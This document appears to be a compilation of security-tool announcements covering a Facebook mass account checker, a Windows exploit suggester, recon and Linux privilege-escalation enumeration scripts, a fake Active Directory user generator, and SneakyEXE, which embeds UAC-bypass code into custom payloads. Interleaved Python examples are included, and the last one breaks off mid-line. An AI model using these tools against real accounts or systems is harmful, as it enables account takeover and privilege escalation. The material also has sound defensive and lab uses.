Facebook Mass Account Checker

Simple Installation :
apt install git
apt install php
git clone https://github.com/fdciabdul/fbchecker
cd fbchecker
php fbcheck.php
Usage
 php fbcheck.php target.txt


Wesng - Windows Exploit Suggester


WES-NG is a tool that takes the output of Windows' systeminfo utility and lists the vulnerabilities the OS is exposed to, including any public exploits for those vulnerabilities. Every Windows OS between Windows XP and Windows 10, including their Windows Server counterparts, is supported.

Usage
  1. Obtain the latest database of vulnerabilities by executing the command wes.py --update.
  2. Use Windows' built-in systeminfo.exe tool to obtain the system information of the local system, or from a remote system using systeminfo.exe /S MyRemoteHost, and redirect this to a file: systeminfo > systeminfo.txt
  3. Execute WES-NG with the systeminfo.txt output file as the parameter: wes.py systeminfo.txt. WES-NG then uses the database to determine which patches are applicable to the system and to which vulnerabilities are currently exposed, including exploits if available.
  4. As the data provided by Microsoft is frequently incomplete and false positives are reported by wes.py, make sure to check the Eliminating false positives page at the Wiki on how to deal with this. For an overview of all available parameters, check CMDLINE.md.
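The two steps wes.py performs after the database update (parse systeminfo, then resolve the installed KBs against the patch data), as an added example that is not WES-NG's code: a constructed systeminfo dump, a constructed stand-in for CVEs.csv with placeholder CVE and KB numbers, and a check that honours supersedence, which is where many of the false positives mentioned in step 4 come from.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Set

# Constructed `systeminfo` output (English locale). Host name and hotfix numbers are placeholders.
SYSTEMINFO = """\
Host Name:                 WIN10-LAB
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.17134 N/A Build 17134
OS Manufacturer:           Microsoft Corporation
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB9990101
                           [02]: KB9990105
                           [03]: KB9990109
Network Card(s):           1 NIC(s) Installed.
"""

# Constructed stand-in for the CVEs.csv the collector builds: which KB fixes which CVE on which
# build, and which later KBs supersede it. The CVE and KB numbers are placeholders, not real data.
PATCH_DB = [
    {"cve": "CVE-0000-0001", "build": "17134", "kb": "KB9990100", "superseded_by": ["KB9990105"]},
    {"cve": "CVE-0000-0002", "build": "17134", "kb": "KB9990102", "superseded_by": []},
    {"cve": "CVE-0000-0003", "build": "17763", "kb": "KB9990103", "superseded_by": []},  # other build
    {"cve": "CVE-0000-0004", "build": "17134", "kb": "KB9990109", "superseded_by": []},
]


@dataclass
class SystemInfo:
    os_name: str
    build: str
    arch: str
    hotfixes: Set[str]


def parse_systeminfo(text: str) -> SystemInfo:
    """Pull the fields WES-NG needs out of the 'Key:   value' layout. The hotfix list is a run of
    indented '[nn]: KBxxxxxxx' lines, so KB numbers are harvested from every line instead."""
    fields: Dict[str, str] = {}
    kbs: Set[str] = set()
    for line in text.splitlines():
        m = re.match(r"^([A-Za-z][A-Za-z()/ ]*?):\s+(.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
        kbs.update(re.findall(r"\bKB\d{6,7}\b", line))
    build = re.search(r"Build (\d+)", fields["OS Version"]).group(1)
    arch = "x64" if "x64" in fields.get("System Type", "") else "x86"
    return SystemInfo(fields["OS Name"], build, arch, kbs)


def exposed_cves(info: SystemInfo, db: List[dict]) -> List[str]:
    """A CVE is still open when its build matches and neither the fixing KB nor any KB that
    supersedes it is installed. Ignoring supersedence is a major source of false positives:
    a host that only carries the cumulative update would otherwise look unpatched."""
    open_cves = []
    for entry in db:
        if entry["build"] != info.build:
            continue
        fixes = {entry["kb"], *entry["superseded_by"]}
        if not (fixes & info.hotfixes):
            open_cves.append(entry["cve"])
    return sorted(open_cves)


if __name__ == "__main__":
    info = parse_systeminfo(SYSTEMINFO)
    print(info.os_name, info.build, info.arch, sorted(info.hotfixes))
    print("exposed:", exposed_cves(info, PATCH_DB))
```

Two caveats carry over to real data: systeminfo output is localised, so the "OS Version" and "Hotfix(s)" keys differ on non-English systems, and a hotfix that systeminfo does not list (some updates are only visible through wmic qfe or the registry) will show up as a false positive no matter how good the supersedence data is.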

Collector
This GitHub repository regularly updates the database of vulnerabilities, so running wes.py with the --update parameter gets the latest version. If manual generation of the .csv file with hotfix information is required, use the scripts from the /collector folder to compile the database. Read the comments at the top of each script and execute them in the order listed below. Executing these scripts will produce CVEs.csv. The WES-NG collector pulls information from various sources:
  • Microsoft Security Bulletin Data: KBs for older systems [1]
  • MSRC: The Microsoft Security Update API of the Microsoft Security Response Center (MSRC): Standard source of information for modern Microsoft Updates [2]
  • NIST National Vulnerability Database (NVD): Complement vulnerabilities with Exploit-DB links [3]
These are combined into a single .csv file which is compressed and hosted in this GitHub repository.

Rationale
I developed WES-NG because while GDSSecurity's Windows-Exploit-Suggester worked excellently for operating systems in the Windows XP and Windows Vista era, GDSSecurity's Windows-Exploit-Suggester does not work for operating systems like Windows 10 and vulnerabilities published in recent years. This is because Microsoft replaced the Microsoft Security Bulletin Data Excel file [1] on which GDSSecurity's Windows-Exploit-Suggester is fully dependent, by the MSRC API [2]. The Microsoft Security Bulletin Data Excel file has not been updated since Q1 2017, so later operating systems and vulnerabilities cannot be detected. Thanks @gdssecurity, for this great tool which has served many of us for so many years!

Bugs

Changelog

Improvements
  • Add support for NoPowerShell's Get-SystemInfo cmdlet output
  • Add support for wmic qfe output together with support for parameters to manually specify the operating system
  • Add support for alternative output formats of systeminfo (csv, table)
  • More testing on the returned false positive vulnerabilities - see also the wiki
  • Add support for Itanium architecture

References


Authored by Arris Huijgen (@bitsadmin - https://github.com/bitsadmin/)



Rock-ON - An All In One Recon Tool That Will Just Get A Single Entry Of The Domain Name And Do All Of The Work Alone


Rock-On is an all-in-one recon tool that gives your recon process a boost. It is mainly aimed at automating the whole recon workflow and saving the time otherwise spent doing all of this manually. A thorough blog post will be up in some time. Stay tuned for the stable version with a UI.

Features
  1. Sub Domain Scraping
  2. Finding ASNs -> netblocks -> IPs
  3. Resolving
  4. Finding Ports
  5. Finding VHost
  6. Finding Directories
  7. Finding Sub Takeovers
  8. Asset tracker with live monitoring
  9. Push Notifications to Slack
  10. Finding JS link then relative links in them and some sensitive files
  11. Active and passive crawling

Recommendation
Machine configuration: Debian 9.4 with 4 GB RAM on DigitalOcean; it is best to run this tool on a new, fresh VPS.

For Censys:
Set the API ID and SECRET KEY in sub.sh, unless you want to enter them again and again.
To set them permanently:
1. Delete lines 13-18 of sub.sh
2. Then set your API ID and SECRET KEY on lines 47 and 48 like this: export CENSYS_API_ID=your_key_here

For getting notification on Slack:
Change the webhook address to your own in sub.sh, ASN.sh and Tools/sublert/config.py to get notifications while you work on something else.
For changing:
1. Replace the Webhook address at line 113 in sub.sh and 15 in ASN.sh
2. Replace the Webhook address in Tools/sublert/config.py

AND
Follow @yassineaboukir guide to configure the slack for sublert and also for creating a webhook address for sub.sh and ASN.sh here: https://medium.com/@yassineaboukir/automated-monitoring-of-subdomains-for-fun-and-profit-release-of-sublert-634cfc5d7708

Tools Added
Thanks to all the authors who have written these scripts and made a huge contribution to the community. A big shout-out to @ehsahil for his blog on recon, which helped me a lot while making this tool and taking examples for the repository.
  1. Sublist3r
  2. Knock
  3. Subfinder
  4. Censys
  5. Amass
  6. CT Logs
  7. CTFR
  8. Wayback
  9. San Domains
  10. AltDns
  11. NMAP
  12. Masscan
  13. MassDNS
  14. Sublert
  15. Aquatone
  16. Vhost
  17. Rapid7 FDNS DB
  18. AWS-CLI
  19. Dirsearch
  20. More to be added...

Requirements

Go language
Install by Following methods:
wget https://dl.google.com/go/go1.12.5.linux-amd64.tar.gz
tar -C /usr/local -xzf go1.12.5.linux-amd64.tar.gz
rm -f go1.12.5.linux-amd64.tar.gz
nano ~/.profile
Add these lines:
export PATH=$PATH:/usr/local/go/bin
export GOROOT=/usr/local/go

Installation

Note: For a new Fresh VPS run this commands first:
sudo apt-get update && sudo apt-get upgrade && sudo apt-get install git
git clone https://github.com/SilverPoision/Rock-ON.git
cd Rock-ON
chmod +x rockon.sh
./rockon.sh
1
Also don't forget to configure your AWS credentials by running
aws configure

Usage
./rockon.sh
Enter your choice and then the required Information.

Screenshot



Note: Run the below command while running the 4th option for the first time.
gem install colorize

Give Rock-On some Love
If this tool was useful to you during your recon stages - I would love to know. Any suggestions or ideas for this tool are appreciated - Just DM me on Facebook or Twitter


Youzer - Fake User Generator For Active Directory Environments


Fake User Generator for Active Directory Environments

Introduction
The goal of Youzer is to create information rich Active Directory environments. This uses the python3 library 'faker' to generate random accounts.
pip3 install faker
You can either supply a wordlist or have the passwords generated. The generated option is great for testing things like hashcat rule masks. The wordlist option is useful when you want to seed a specific password list into an environment, or to practice dictionary attacks.
The output is a CSV and a PowerShell script; both can be copied to the target. When executed, the PowerShell script binds over LDAP, so it doesn't rely on the newer ActiveDirectory module, and creates each user object. Currently the OUs need to exist, but this tool is a sub-project of 'Labseed', where the Active Directory structure will be created.
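The generation step described above, as an added example that is not Youzer's code: user rows in Youzer's CSV layout, built in either generate or wordlist mode, with duplicate names disambiguated because a second "Dennis Shaw" in the same OU would fail to import. Small constructed name pools stand in for the faker library so the example runs without it; the PowerShell import script is not produced here.

```python
import csv
import io
import random
import secrets
import string
from typing import Dict, List, Optional

# Small constructed name pools standing in for the 'faker' library, so this runs without it.
FIRST_NAMES = ["Dennis", "Sam", "Ellie", "Terence", "Anne", "Wendy", "Jay", "Adam", "Georgina", "Lee"]
LAST_NAMES = ["Shaw", "Francis", "Freeman", "Arnold", "Murphy", "Smith", "Lyons", "White", "Roberts", "Jones"]
FIELDS = ["Name", "GivenName", "sn", "ou", "password", "address", "description"]   # Youzer's CSV header


def generated_password(length: int) -> str:
    """Alphanumeric password from the OS CSPRNG (the 'generate' mode)."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))


def generate_users(count: int, ou: str, wordlist: Optional[List[str]] = None,
                   length: int = 20, seed: Optional[int] = None) -> List[Dict[str, str]]:
    """Build user rows. With a wordlist, passwords are drawn from it (dictionary-attack practice);
    without one they are random. Names are made unique because AD rejects a duplicate CN in one OU."""
    rng = random.Random(seed)
    seen: Dict[str, int] = {}
    rows = []
    for _ in range(count):
        first, last = rng.choice(FIRST_NAMES), rng.choice(LAST_NAMES)
        base = f"{first} {last}"
        n = seen.get(base, 0)
        seen[base] = n + 1
        name = base if n == 0 else f"{base}{n + 1}"
        password = rng.choice(wordlist) if wordlist else generated_password(length)
        rows.append({"Name": name, "GivenName": first, "sn": last, "ou": ou,
                     "password": password, "address": "", "description": ""})
    return rows


def to_csv(rows: List[Dict[str, str]]) -> str:
    """Render rows in Youzer's column order; the OU is quoted because it contains commas."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=FIELDS, lineterminator="\n")
    writer.writeheader()
    writer.writerows(rows)
    return buf.getvalue()


if __name__ == "__main__":
    print(to_csv(generate_users(5, "ou=sales,dc=example,dc=domain", length=20, seed=1)), end="")
```

The name pools are tiny, so duplicates appear quickly; with faker's much larger pools the same collision still happens at scale (100,000 users), which is why the dedupe step matters before the PowerShell import runs.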

RoadMap
  • Generate multiple departments (OUs)
  • Generate grouping structure and randomly assign
  • Implement additional Faker object options to populate other LDAP fields such as Address, Region
  • Create an organisational chart of the nested grouping structure

Examples
Youzer can create 100,000 users in under 30 seconds and 1,000,000 users in around 3 minutes.
[-] Domain Name set to : example
[*] Writing to output file : sales_example.csv
[!] Generating 100000 users in password generate mode
[!] Creating Powershell script for import : sales_example.ps1
python3 youzer.py --generate --generate_length 20 --ou --domain example 20.35s user 0.11s system 95% cpu 21.354 total

YouTube Video


Creating 1000 user accounts with a randomly generated alphanumeric password choice of 20 characters
python3 youzer.py --generate --generate_length 20 --ou "ou=sales,dc=example,dc=domain" --domain example --users 1000 --output sales_example.csv



[Youzer ASCII-art banner]
version : 0.1

author : @lorentzenman
team : SpiderLabs


[-] Domain Name set to : example
[*] Writing to output file : sales_example.csv
[!] Generating 1000 users in password generate mode
[!] Creating Powershell script for import : sales_example.ps1
Sample output from CSV file created from generate option
Name,GivenName,sn,ou,password,address,description
Dennis Shaw,Dennis,Shaw,"ou=sales,dc=example,dc=domain",VwVeloi09FaECRdNbbXD,
Sam Francis,Sam,Francis,"ou=sales,dc=example,dc=domain",qhitxgjDW4gZFuraLJbB,
Ellie Freeman,Ellie,Freeman,"ou=sales,dc=example,dc=domain",7qbLcknqlPtpkOzdLyw3,
Terence Arnold,Terence,Arnold,"ou=sales,dc=example,dc=domain",lumPMbDk1YomypRj26by,
Anne Murphy,Anne,Murphy,"ou=sales,dc=example,dc=domain",6r42EGGoEJYe9PydHRTV,
Wendy Smith,Wendy,Smith,"ou=sales,dc=example,dc=domain",tKI2zFUOU8XdK4ZTUJas,
Jay Lyons,Jay,Lyons,"ou=sales,dc=example,dc=domain",wxEIbw18tW9uFYXtMI9H,
Jonathan White,Jonathan,White,"ou=sales,dc=example,dc=domain",caoHcm2Y90lIH7zskJYr,
Adam Roberts,Adam,Roberts,"ou=sales,dc=example,dc=domain",Qu0y7mlb2haQQddxYrcN,
Georgina Jones,Georgina,Jones,"ou=sales,dc=example,dc=domain",rYBjxs4tpj9Qza7HcKYI,
Lee Newton,Lee,Newton,"ou=sales,dc=example,dc=domain",6CVlBvEutc3Ahco2UI5q,
Aaron Smith,Aaron,Smith,"ou=sales,dc=example,dc=domain",hmSSoKILfvrHuHbPTDIQ,
Max Hall,Max,Hall,"ou=sales,dc=example,dc=domain",11Ys9Zdk2M8J1JAScBkP,
Kimberley Douglas,Kimberley,Douglas,"ou=sales,dc=example,dc=domain",WQ9285gSHv2MXkwoLYlg,
Denise Fisher,Denise,Fisher,"ou=sales,dc=example,dc=domain",CT1pbfAnCoezuyrJbQX9,

Creating 1000 user accounts from a source word list
python3 youzer.py --wordlist ~/tools/pw/Probable-Wordlists/Real-Passwords/Top12Thousand-probable-v2.txt --ou "ou=IT,dc=example,dc=domain" --domain example --users 1000 --output IT_example.csv





[-] Domain Name set to : example
[*] Writing to output file : IT_example.csv
[!] Generating 1000 users in wordlist mode
[!] Creating Powershell script for import : IT_example.ps1
Sample output of CSV file from above wordlist option
Name,GivenName,sn,ou,password,address,description
Rhys Parker,Rhys,Parker,"ou=IT,dc=example,dc=domain",houston,
Geoffrey Harris,Geoffrey,Harris,"ou=IT,dc=example,dc=domain",clothing,
Georgia Davis,Georgia,Davis,"ou=IT,dc=example,dc=domain",spotty,
Gemma Norris,Gemma,Norris,"ou=IT,dc=example,dc=domain",brendan1,
Daniel Marsh,Daniel,Marsh,"ou=IT,dc=example,dc=domain",pauline,
Dominic Harvey,Dominic,Harvey,"ou=IT,dc=example,dc=domain",devin,
Teresa Stokes,Teresa,Stokes,"ou=IT,dc=example,dc=domain",snapple,
Joanna Morgan,Joanna,Morgan,"ou=IT,dc=example,dc=domain",volcom,
Oliver Middleton,Oliver,Middleton,"ou=IT,dc=example,dc=domain",master,
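The CSV columns above map directly onto New-ADUser parameters, which is what the generated import script does. The following Python is an added example, not Youzer's own generator: it reads a CSV in the header layout shown (Name,GivenName,sn,ou,password,address,description) and emits one New-ADUser line per row. The sAMAccountName convention (first initial plus surname) and the UPN suffix are assumptions, and the two-row CSV is constructed.

```python
"""Convert a Youzer-style CSV into a PowerShell New-ADUser import script.

Added example, not Youzer's generator. The CSV header matches the one shown
above: Name,GivenName,sn,ou,password,address,description."""
import csv
import io

# Constructed two-row sample in the same layout as the CSV output above.
SAMPLE_CSV = """Name,GivenName,sn,ou,password,address,description
Rhys Parker,Rhys,Parker,"ou=IT,dc=example,dc=domain",houston,,
Sam Francis,Sam,Francis,"ou=sales,dc=example,dc=domain",qhitxgjDW4gZFuraLJbB,,
"""


def ps_quote(value):
    """Single-quote a value for PowerShell. Inside '...' the only escape is a
    doubled quote, so passwords containing $, ` or " pass through literally."""
    return "'" + value.replace("'", "''") + "'"


def sam_account_name(given, surname):
    """Assumed naming convention: first initial + surname, lower-case, cut to
    the 20-character sAMAccountName limit."""
    return (given[:1] + surname).lower()[:20]


def build_import_script(csv_text, upn_suffix="example.domain"):
    """Return the script as a list of PowerShell lines, one New-ADUser per row."""
    lines = ["Import-Module ActiveDirectory"]
    for row in csv.DictReader(io.StringIO(csv_text)):
        sam = sam_account_name(row["GivenName"], row["sn"])
        cmd = (
            "New-ADUser"
            f" -Name {ps_quote(row['Name'])}"
            f" -GivenName {ps_quote(row['GivenName'])}"
            f" -Surname {ps_quote(row['sn'])}"
            f" -SamAccountName {ps_quote(sam)}"
            f" -UserPrincipalName {ps_quote(sam + '@' + upn_suffix)}"
            f" -Path {ps_quote(row['ou'])}"  # the ou column is the target OU's DN
            f" -AccountPassword (ConvertTo-SecureString {ps_quote(row['password'])} -AsPlainText -Force)"
            " -Enabled $true"
        )
        if row.get("description"):
            cmd += f" -Description {ps_quote(row['description'])}"
        lines.append(cmd)
    return lines


if __name__ == "__main__":
    print("\n".join(build_import_script(SAMPLE_CSV)))
```

The resulting .ps1 contains every password in clear text, exactly as the Youzer-generated script does; treat it as lab material and delete it once the accounts exist.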


DarkScrape - OSINT Tool For Scraping Dark Websites


OSINT Tool to find Media Links in Tor Sites.

Tested On
  • Kali Linux 2019.2
  • Ubuntu 18.04
  • Nethunter
  • Arch Linux

Installation
git clone https://github.com/itsmehacker/DarkScrape.git
pip3 install -r requirements.txt

Features
  • Download Media
  • Scrape From Single Url
  • Scraping From Files
    • Txt
    • Csv
    • Excel

Inspired By:
Jake Creps @jakecreps


NetSet - Operational Security Utility And Automator


Operational Security utility and automator.
NetSet automates a number of operations that help the user secure their network traffic. It also provides an easy way to gather proxies and run utilities through Tor.
Every utility NetSet installs is configured automatically as well. The tool itself is not the whole of operational security; it is a convenient way of getting set up with the basics.
NetSet facilitates, among other things:
  • A terminal multiplexer on demand, with its sessions routed through Tor.
  • Secured DNS traffic through automatic installation and configuration of DNSCrypt-proxy.
  • Tor Wall functionality that forces all traffic through the Tor network.
  • Easy access to online OPSEC resources; the web resources in question can be opened in-script.
And more.

Usage
After cloning the repo, navigate to the NetSet directory and run the following:
chmod +x *.sh
./netset-main.sh --install

# optionally with sudo (see the Update section below for the trade-offs)
sudo ./netset-main.sh --install
This will install and configure everything NetSet needs to function properly.

Update
Starting the script with sudo executes every operation inside it as root, so you will not be prompted for your sudo password when an operation requires elevated privileges. However, everything NetSet writes will consequently be owned by root as well, including backup directories. Last but not least, from a security standpoint it is not recommended to run everything with superuser privileges.
Starting the main script with sudo is therefore optional from now on.

Options
Please see an option overview below.
CLI Arguments
'-t' or '--terminal'   Starts terminal multiplexer with all connections routed through Tor
'-s' or '--status'     Prints a status overview of NetSet-related network utilities and their current state
'-i' or '--install'    Runs a script that installs all of NetSet's dependencies and configures them

Menu Options
'Usage'            - Print options overview
'Status'           - Print status overview
'Spoof MAC'        - Spoof MAC address
'Random Proxies'   - Scrape random proxies
'GeoSort Proxies'  - Scrape geo-sorted proxies
'ProtonVPN'        - Start ProtonVPN
'Tor Terminal'     - Start terminal multiplexer, with all sessions routed through Tor
'Tor Wall'         - Configure iptables to force all connections through Tor
'OPSEC Resources'  - Display NetSet's included list of web resources; select an entry to open it in your default browser

Note
Tested on Ubuntu 19.04
I plan on expanding this tool in the future with even more OPSEC-related resources and/or operations.
Should you come across a bug or have any questions regarding this tool, please feel free to open a ticket.


SneakyEXE - Embedding "UAC-Bypassing" Function Into Your Custom Payload


A tool which helps you embed a UAC-bypassing function into your custom Win32 payloads (x86_64 architecture specifically)
  • Tested on Windows 7,8,10 ( 64bit)
  • Free and Open-sourced with full source codes published

Tutorial


Requirements:
                Linux        Windows
Architecture    Optional     x86_64
Python 3.x >    YES          NO
Module          termcolor    NO
Distros         Any          Windows
Version         Any          Windows 7,8,10

Usage:
[ Linux ]:
This tool requires the Python module termcolor. The script installs it automatically on first run if it is missing, but installing it manually beforehand lets the tool start faster:
$ pip3 install termcolor #installing termcolor
$ #Temporary usage only, installation below
$ git clone https://github.com/Zenix-Blurryface/SneakyEXE.git
$ cd SneakyEXE/Linux
$ chmod +x sneakyexe.py
$ ./sneakyexe.py <option>=<path to payload/code> out=<where you want to save>
[ Windows ]:
  • visit https://github.com/Zenix-Blurryface/SneakyEXE
  • Download the repository, "clone or download" -> "Download ZIP"
  • Unzip it into your optional directory
  • Change dir to \SneakyEXE\Win32\
  • Execute sneakyexe.exe ( or sys\sneakyexe.exe for an improved startup speed )
  • ( Optional : you can copy sneakyexe.exe to whatever directory you want and delete the unzipped one )
- NOTE -
The payload only succeeds when run by a user who holds Administrator privilege, i.e. a member of the Administrators group whose session runs under the filtered (medium-integrity) token that UAC issues. Users with a limited standard-user token will not succeed, because their account has no elevated token to obtain.

Installation:

[ Linux ]:
$ git clone https://github.com/Zenix-Blurryface/SneakyEXE.git
$ cd SneakyEXE
$ chmod +x install.sh
$ sudo ./install.sh
[ Windows ]:
  • UNAVAILABLE
  • ( Soon will if many people demand )

Build:

  • Built on Opensuse Leap 15.0
  • Developed using Python 3.6.5
  • Developed with gcc (MinGW.org GCC-8.2.0-3) 8.2.0 for the payload compilation

[ Payload Embedding ]
  • In order to build the elevator from source, you will need gcc 8.2.0 (C11) and an AMD64 machine running 64-bit Windows 10 (or 7/8).
# Windows 10/7/8 (AMD64)
# Open cmd.exe / powershell.exe
>> gcc -mwindows -o <output>.exe /source/main.c

[ GUI Version ]
  • In order to build the GUI version from source, you will need Python 3.5.6 ( or higher ) with modules like Pyinstaller, Pillow and a AMD64 machine with Windows 10 (7/8) 64-bit installed.
# Assume we already had  Python preinstalled
# Open cmd.exe / powershell.exe
>> pip install pillow # Installing Pillow
>> pip install pyinstaller # Installing Pyinstaller
>> mkdir compile # Optional directory name
>> cd compile
>> pyinstaller --windowed --onefile --icon=Icon.ico /source/Win32/GUI.py # For the systematic version ( /sys ), remove --onefile
>> cd dist
>> GUI.exe # The compiled executable :}

Disclaimer:

  • This tool was made for academic purposes or ethical cases only. I am not taking any responsibility for your actions if you abuse this tool for any black-hat activity.
  • Feel free to use this project in your software, just don't reclaim the ownership.

Release:

  • v0.9 beta

Credits:

This tool embeds UACme, which was originally coded by hfiref0x; the rest was pretty much all coded by me ( Zenix Blurryface )

Author:

Copyright © 2019 by Zenix Blurryface


Whonix v15 - Anonymous Operating System


Whonix is an operating system focused on anonymity, privacy and security. It’s based on the Tor anonymity network, Debian GNU/Linux and security by isolation. DNS leaks are impossible, and not even malware with root privileges can find out the user’s real IP.

Whonix consists of two parts: One solely runs Tor and acts as a gateway, which we call Whonix-Gateway. The other, which we call Whonix-Workstation, is on a completely isolated network. Only connections through Tor are possible.

After approximately one year of development, the Whonix Project is proud to announce the release of Whonix 15.
Whonix 15 is based on Debian buster (Debian 10). This means users have access to many new software packages alongside existing ones, such as a modern branch of GnuPG, and more.

Major Changes and New Features

ChangeLog


Linux-Smart-Enumeration - Linux Enumeration Tool For Pentesting And CTFs With Verbosity Levels


First, a couple of useful oneliners ;)
wget "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -O lse.sh
curl "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -o lse.sh

linux-smart-enumeration
Linux enumeration tools for pentesting and CTFs
This project was inspired by https://github.com/rebootuser/LinEnum and uses many of its tests.
Unlike LinEnum, lse tries to expose the information gradually, according to its importance from a privesc point of view.

What is it?
This script will show relevant information about the security of the local Linux system.
It has 3 levels of verbosity so you can control how much information you see.
In the default level you should see the highly important security flaws in the system. Level 1 (./lse.sh -l1) shows interesting information that should help you to privesc. Level 2 (./lse.sh -l2) will just dump all the information it gathers about the system.
By default it will ask you some questions: mainly the current user's password (if you know it ;) so it can do some additional tests.

How to use it?
The idea is to get the information gradually.
First you should execute it just like ./lse.sh. If you see some green yes!, you probably already have some good stuff to work with.
If not, you should try level 1 verbosity with ./lse.sh -l1 and you will see some more information that can be interesting.
If that does not help, level 2 will just dump everything you can gather about the system using ./lse.sh -l2. In this case you might find it useful to use ./lse.sh -l2 | less -r.
You can also select which tests to execute by passing the -s parameter. With it you can select specific tests or sections to be executed. For example ./lse.sh -l2 -s usr010,net,pro will execute the test usr010 and all the tests in the sections net and pro.
Use: ./lse.sh [options]

OPTIONS
-c Disable color
-i Non interactive mode
-h This help
-l LEVEL Output verbosity level
0: Show highly important results. (default)
1: Show interesting results.
2: Show all gathered information.
-s SELECTION Comma separated list of sections or tests to run. Available
sections:
usr: User related tests.
sud: Sudo related tests.
fst: File system related tests.
sys: System related tests.
sec: Security measures related tests.
ret: Recurrent tasks (cron, timers) related tests.
net: Network related tests.
srv: Services related tests.
pro: Processes related tests.
sof: Software related tests.
ctn: Container (docker, lxc) related tests.
Specific tests can be used with their IDs (i.e.: usr020,sud)

Is it pretty?

Usage demo
Also available in webm video


Level 0 (default) output sample


Level 1 verbosity output sample


Level 2 verbosity output sample




Rifiuti2 - Windows Recycle Bin Analyser


Rifiuti2 is a tool for analyzing Windows Recycle Bin index data (the legacy INFO2 file and the $Recycle.bin folder of newer Windows versions). Analysis of the Windows Recycle Bin is usually carried out during Windows computer forensics. Rifiuti2 can extract the deletion time, original path and size of deleted files, and whether the trashed files have been permanently removed.
For those interested in what it does, and what functionality it provides, please check out the official site for more info. Latest features and changes can be found in the NEWS file.

Special note for 0.7.0
  • Windows binaries will be automatically built from Appveyor and published to Github.
  • A system supporting UTF-8 encoding is mandatory, except on the Windows console (file output is also in UTF-8). This shouldn't be problematic, as a UTF-8 locale is pretty much standard for Linux and macOS these days. On the Windows side, there are already many full-featured text editors capable of opening UTF-8 Unicode text files.
  • As a result, the -8 option is obsolete and no longer affects output in any way.

Usage
rifiuti2 is designed to be portable and runs in a command line environment. Depending on the Windows recycle bin format involved, there are two binaries to choose from (most users will want the first one):

Program          Recycle bin from OS    Purpose
rifiuti-vista    Vista – Win10          Scans $Recycle.bin style folder
rifiuti          Win95 – XP/2003        Reads INFO or INFO2 file in \RECYCLED or \RECYCLER folder

Run the programs without any option for more detail. Here are some of the more frequently used options:

Option       Purpose
-o <FILE>    Output to file
-x           Output XML instead of tab-separated fields
-l <CP>      Display legacy (8.3) filenames and specify their codepage

Please consult manpage (Unix) or README.html (bundled with Windows binaries) for complete options and detailed usage description.

Examples
  • rifiuti-vista.exe -x -z -o result.xml \case\S-1-2-3\
Scan for index files under \case\S-1-2-3\, adjust all deletion time for local time zone, and write XML output to result.xml
  • rifiuti -l CP932 -t "\n" INFO2
Assume INFO2 file is generated from Japanese Windows (codepage 932), and display each field line by line, instead of separated by tab
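What the two index formats actually contain, as an added example (not rifiuti2's code): minimal Python parsers for an INFO2 file and for a $I record from a $Recycle.bin folder, recovering the same fields the tool reports, namely deletion time, original path, size and the "permanently removed" flag. The record layouts are the commonly documented ones (800-byte INFO2 records on Win2000/XP; $I version 1 with a fixed 520-byte path and version 2 with a length-prefixed path); every byte of sample data is constructed by the builder functions at the bottom, not captured from a real machine.

```python
"""Parsers for the two Recycle Bin index formats rifiuti2 reads: the legacy
INFO2 file (Win95 - XP/2003) and the per-file $I records under $Recycle.bin
(Vista onwards). Added example, not rifiuti2's code. Record layouts follow
the commonly documented structures; all sample bytes are constructed below."""
import struct
from datetime import datetime, timedelta, timezone

_FT_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
SAMPLE_TIME = datetime(2019, 7, 1, 12, 30, tzinfo=timezone.utc)  # constructed


def filetime_to_dt(ft):
    """FILETIME (100 ns ticks since 1601-01-01 UTC) -> timezone-aware datetime."""
    return _FT_EPOCH + timedelta(microseconds=ft // 10)


def dt_to_filetime(dt):
    delta = dt - _FT_EPOCH
    return ((delta.days * 86400 + delta.seconds) * 10**6 + delta.microseconds) * 10


INFO2_HEADER = 20   # five uint32: version, two unknowns, record size, total size
INFO2_RECORD = 800  # Win2000/XP record size (older Win95 INFO files differ; not handled)
# ANSI path, record index, drive number, deletion FILETIME, file size, UTF-16 path
_INFO2_REC = struct.Struct("<260sIIQI520s")


def parse_info2(data):
    _version, _, _, rec_size, _ = struct.unpack_from("<5I", data, 0)
    if rec_size != INFO2_RECORD:
        raise ValueError(f"unexpected INFO2 record size {rec_size}")
    records = []
    for off in range(INFO2_HEADER, len(data) - INFO2_RECORD + 1, INFO2_RECORD):
        ansi, index, drive, ft, size, uni = _INFO2_REC.unpack_from(data, off)
        records.append({
            "index": index,
            "drive": chr(ord("A") + drive),
            "deleted": filetime_to_dt(ft),
            "size": size,
            "path": uni.decode("utf-16-le").split("\x00", 1)[0],
            # Emptying or restoring an entry zeroes the first byte of the ANSI
            # path; the Unicode copy survives, which is how the name is recovered.
            "permanently_removed": ansi[0] == 0,
        })
    return records


def parse_dollar_i(data):
    """$I<random>.<ext>: uint64 version, uint64 size, FILETIME, then the path."""
    version, size, ft = struct.unpack_from("<QQQ", data, 0)
    if version == 1:          # Vista - Win8: fixed 520-byte UTF-16 path
        raw = data[24:24 + 520]
    elif version == 2:        # Win10: uint32 character count, then the path
        (count,) = struct.unpack_from("<I", data, 24)
        raw = data[28:28 + 2 * count]
    else:
        raise ValueError(f"unknown $I version {version}")
    return {"size": size, "deleted": filetime_to_dt(ft),
            "path": raw.decode("utf-16-le").split("\x00", 1)[0]}


# --- constructed test data, not captured from a real system -----------------
def build_info2(entries):
    """entries: (index, drive_no, deleted_at, size, path, permanently_removed)."""
    body = b""
    for index, drive, when, size, path, removed in entries:
        ansi = path.encode("ascii")
        if removed:
            ansi = b"\x00" + ansi[1:]
        body += _INFO2_REC.pack(ansi, index, drive, dt_to_filetime(when), size,
                                path.encode("utf-16-le"))
    return struct.pack("<5I", 5, 0, 0, INFO2_RECORD, len(body)) + body


def build_dollar_i_v2(when, size, path):
    encoded = (path + "\x00").encode("utf-16-le")
    return struct.pack("<QQQI", 2, size, dt_to_filetime(when), len(encoded) // 2) + encoded


if __name__ == "__main__":
    sample = build_info2([(1, 2, SAMPLE_TIME, 4096, r"C:\Users\alice\secret.docx", False),
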